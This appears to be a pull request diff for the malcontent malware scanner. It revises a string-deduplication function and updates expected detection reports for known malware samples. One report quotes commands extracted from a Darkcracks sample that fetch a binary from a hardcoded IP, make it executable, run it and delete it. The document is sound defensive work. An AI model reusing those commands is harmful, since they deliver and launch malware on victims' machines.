chainguard-dev
diff --git a/‎pkg/action/testdata/scan_archive‎
Lines changed: 259 additions & 259 deletions b/‎pkg/action/testdata/scan_archive‎
Lines changed: 259 additions & 259 deletions
diff --git a/‎pkg/report/report.go‎
Lines changed: 35 additions & 19 deletions b/‎pkg/report/report.go‎
Lines changed: 35 additions & 19 deletions
diff --git a/‎pkg/report/report_test.go‎
Lines changed: 1 addition & 1 deletion b/‎pkg/report/report_test.go‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎pkg/report/strings.go‎
Lines changed: 1 addition & 0 deletions b/‎pkg/report/strings.go‎
Lines changed: 1 addition & 0 deletions
diff --git a/‎tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff‎
Lines changed: 11 additions & 11 deletions b/‎tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff‎
Lines changed: 11 additions & 11 deletions
diff --git a/‎tests/linux/2024.Darkcracks/darkcracks.sh.md‎
Lines changed: 2 additions & 2 deletions b/‎tests/linux/2024.Darkcracks/darkcracks.sh.md‎
Lines changed: 2 additions & 2 deletions
diff --git a/‎tests/linux/2024.kubo_injector/injector.json‎
Lines changed: 1 addition & 1 deletion b/‎tests/linux/2024.kubo_injector/injector.json‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎tests/linux/2024.vncjew/__min__c.json‎
Lines changed: 25 additions & 25 deletions b/‎tests/linux/2024.vncjew/__min__c.json‎
Lines changed: 25 additions & 25 deletions
@@ -6,6 +6,7 @@ package report
 import (
 	"context"
 	"fmt"
+	"maps"
 	"net/url"
 	"path/filepath"
 	"regexp"
@@ -252,34 +253,44 @@ func longestUnique(raw []string) []string {
 		return raw
 	}
 
-	safe := make([]string, len(raw))
-	copy(safe, raw)
-
-	// Sort by length first (descending)
-	sort.Slice(safe, func(i, j int) bool {
-		return len(safe[i]) > len(safe[j])
-	})
+	unique := make(map[string]struct{}, len(raw))
+	for _, s := range raw {
+		if s != "" {
+			unique[s] = struct{}{}
+		}
+	}
 
-	longest := make([]string, 0, len(safe))
-	seen := make(map[string]bool, len(safe))
+	if len(unique) == 0 {
+		return nil
+	}
 
-	// Since we sorted by length, longest strings come first
-	// This ensures we keep the longest strings that contain shorter ones
-	for _, s := range safe {
-		if s == "" || seen[s] {
-			continue
+	keys := slices.Sorted(maps.Keys(unique))
+	slices.SortFunc(keys, func(a, b string) int {
+		diff := len(b) - len(a)
+		switch {
+		case diff != 0:
+			return diff
+		case a < b:
+			return -1
+		case a > b:
+			return 1
+		default:
+			return 0
 		}
+	})
+
+	longest := make([]string, 0, len(keys))
 
-		isLongest := true
+	for _, s := range keys {
+		contained := false
 		for _, o := range longest {
 			if strings.Contains(o, s) {
-				isLongest = false
+				contained = true
 				break
 			}
 		}
-		if isLongest {
+		if !contained {
 			longest = append(longest, s)
-			seen[s] = true
 		}
 	}
 
@@ -294,7 +305,12 @@ func matchToString(ruleName string, m string) string {
 	switch {
 	case strings.Contains(ruleName, "base64"),
 		strings.Contains(ruleName, "xor"):
-		return ruleName + "::" + m
+		var sb strings.Builder
+		sb.Grow(len(ruleName) + 2 + len(m))
+		sb.WriteString(ruleName)
+		sb.WriteString("::")
+		sb.WriteString(m)
+		return sb.String()
 	case strings.Contains(ruleName, "xml_key_val"):
 		return strings.TrimSpace(strings.ReplaceAll(
 			strings.ReplaceAll(m, "<key>", ""),
 
@@ -20,7 +20,7 @@ func TestLongestUnique(t *testing.T) {
 		{
 			name: "Test 2",
 			raw:  []string{"test", "testing", "tester", "testest"},
-			want: []string{"testing", "testest", "tester"},
+			want: []string{"testest", "testing", "tester"},
 		},
 		{
 			name: "Test 3",
 
@@ -31,6 +31,7 @@ func NewStringPool(length int) *StringPool {
 func (sp *StringPool) Intern(s string) string {
 	sp.RLock()
 	defer sp.RUnlock()
+
 	if interned, ok := sp.strings[s]; ok {
 		return interned
 	}
 
@@ -6,7 +6,7 @@
 | CRITICAL | [evasion/self_deletion/run_and_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_and_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)<br>[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)<br>[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)<br>[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)<br>[sleep 3](https://github.com/search?q=sleep+3&type=code) |
 | CRITICAL | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) |
 | HIGH | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl)<br>[http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v) |
-| HIGH | [c2/tool_transfer/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/shell.yara#tool_chmod_relative_run_tiny) | fetch file, make it executable, and run it | [wget http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -O agr](https://github.com/search?q=wget+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-O+agr&type=code)<br>[curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code)<br>[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)<br>[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)<br>[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)<br>[cd /root](https://github.com/search?q=cd+%2Froot&type=code)<br>[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)<br>[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)<br>[./agr](https://github.com/search?q=.%2Fagr&type=code) |
+| HIGH | [c2/tool_transfer/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/shell.yara#tool_chmod_relative_run_tiny) | fetch file, make it executable, and run it | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code)<br>[wget http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -O agr](https://github.com/search?q=wget+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-O+agr&type=code)<br>[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)<br>[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)<br>[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)<br>[cd /root](https://github.com/search?q=cd+%2Froot&type=code)<br>[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)<br>[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)<br>[./agr](https://github.com/search?q=.%2Fagr&type=code) |
 | MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/bash](https://github.com/search?q=%2Fbin%2Fbash&type=code) |
 | MEDIUM | [fs/file/make_executable](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-make_executable.yara#chmod_executable_shell) | makes file executable | [chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code) |
 | MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./wdvsh](https://github.com/search?q=.%2Fwdvsh&type=code)<br>[./agr](https://github.com/search?q=.%2Fagr&type=code) |
@@ -15,5 +15,5 @@
 | LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run](https://github.com/search?q=%2Fvar%2Frun&type=code) |
 | LOW | [net/http](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http) | Uses the HTTP protocol | [http](https://github.com/search?q=http&type=code) |
 | LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url) | contains embedded HTTP URLs | [http://179.191.68.85](http://179.191.68.85) |
-| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)<br>[cd /root](https://github.com/search?q=cd+%2Froot&type=code)<br>[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)<br>[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code) |
+| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)<br>[cd /root](https://github.com/search?q=cd+%2Froot&type=code)<br>[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)<br>[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) |
 
@@ -62,8 +62,8 @@
                     "Description": "may inject code into other processes",
                     "MatchStrings": [
                         "successfully injected",
-                        "to-inject",
                         "to inject",
+                        "to-inject",
                         "/proc",
                         "maps"
                     ],
 
@@ -39,18 +39,18 @@
                     "MatchStrings": [
                         "nonZeroRandomBytes",
                         "p224RandomPoint",
-                        "p521RandomPoint",
                         "p384RandomPoint",
+                        "p521RandomPoint",
                         "getRandomBatch",
                         "getRandomData",
-                        "serverRandom",
-                        "extendRandom",
                         "clientRandom",
+                        "extendRandom",
+                        "serverRandom",
                         "randomOrder",
                         "randomEnum",
                         "urandom127",
-                        "getrandom",
-                        "GetRandom"
+                        "GetRandom",
+                        "getrandom"
                     ],
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
@@ -243,8 +243,8 @@
                 {
                     "Description": "tls",
                     "MatchStrings": [
-                        "crypto/tls",
                         "TLSVersion",
+                        "crypto/tls",
                         "TLS13"
                     ],
                     "RiskScore": 1,
@@ -480,10 +480,10 @@
                 {
                     "Description": "path reference within /etc",
                     "MatchStrings": [
+                        "/etc/apache/mime.types/etc/ssl/ca-bun",
                         "/etc/pki/ca-trust/extracted/pem/tls-c",
                         "/etc/security/cacerts/usr/local/share",
                         "/etc/ssl/ca-bundle.pem/lib/time/zonei",
-                        "/etc/apache/mime.types/etc/ssl/ca-bun",
                         "/etc/nsswitch.conf/etc/pki/tls/certs",
                         "/etc/ssl/certs/ca-certificates.crt",
                         "/etc/pki/tls/certs/ca-bundle.crt",
@@ -551,8 +551,8 @@
                 {
                     "Description": "modifies file permissions",
                     "MatchStrings": [
-                        "chmod",
-                        "Chmod"
+                        "Chmod",
+                        "chmod"
                     ],
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
@@ -575,8 +575,8 @@
                 {
                     "Description": "vncjew, a VNC scanner",
                     "MatchStrings": [
-                        "readVNCs",
                         "iptables",
+                        "readVNCs",
                         "masscan"
                     ],
                     "RiskScore": 4,
@@ -612,8 +612,8 @@
                 {
                     "Description": "Uses DNS TXT (text) records",
                     "MatchStrings": [
-                        "dns",
-                        "TXT"
+                        "TXT",
+                        "dns"
                     ],
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
@@ -624,8 +624,8 @@
                 {
                     "Description": "Uses the HTTP protocol",
                     "MatchStrings": [
-                        "http",
-                        "HTTP"
+                        "HTTP",
+                        "http"
                     ],
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
@@ -686,8 +686,8 @@
                     "Description": "submits content to websites",
                     "MatchStrings": [
                         "Content-TypeECDSA",
-                        "POST",
                         "HTTP",
+                        "POST",
                         "http"
                     ],
                     "RiskScore": 2,
@@ -796,8 +796,8 @@
                     "Description": "uses VNC remote desktop protocol",
                     "MatchStrings": [
                         "5900",
-                        "vnc",
-                        "VNC"
+                        "VNC",
+                        "vnc"
                     ],
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
@@ -819,8 +819,8 @@
                 {
                     "Description": "listen on a socket",
                     "MatchStrings": [
-                        "socket",
-                        "accept"
+                        "accept",
+                        "socket"
                     ],
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
@@ -1054,8 +1054,8 @@
                 {
                     "Description": "Uses DNS TXT (text) records",
                     "MatchStrings": [
-                        "dns",
-                        "TXT"
+                        "TXT",
+                        "dns"
                     ],
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
@@ -1066,8 +1066,8 @@
                 {
                     "Description": "Uses the HTTP protocol",
                     "MatchStrings": [
-                        "http",
-                        "HTTP"
+                        "HTTP",
+                        "http"
                     ],
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
@@ -1090,8 +1090,8 @@
                     "Description": "uses VNC remote desktop protocol",
                     "MatchStrings": [
                         "5900",
-                        "vnc",
-                        "VNC"
+                        "VNC",
+                        "vnc"
                     ],
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
Original file line number	Diff line number	Diff line change
`@@ -20,7 +20,7 @@ func TestLongestUnique(t *testing.T) {`
`20`	`20`	`{`
`21`	`21`	`name: "Test 2",`
`22`	`22`	`raw: []string{"test", "testing", "tester", "testest"},`
`23`		`- want: []string{"testing", "testest", "tester"},`
	`23`	`+ want: []string{"testest", "testing", "tester"},`
`24`	`24`	`},`
`25`	`25`	`{`
`26`	`26`	`name: "Test 3",`
Original file line number	Diff line number	Diff line change
`@@ -31,6 +31,7 @@ func NewStringPool(length int) *StringPool {`
`31`	`31`	`func (sp *StringPool) Intern(s string) string {`
`32`	`32`	`sp.RLock()`
`33`	`33`	`defer sp.RUnlock()`
	`34`	`+`
`34`	`35`	`if interned, ok := sp.strings[s]; ok {`
`35`	`36`	`return interned`
`36`	`37`	`}`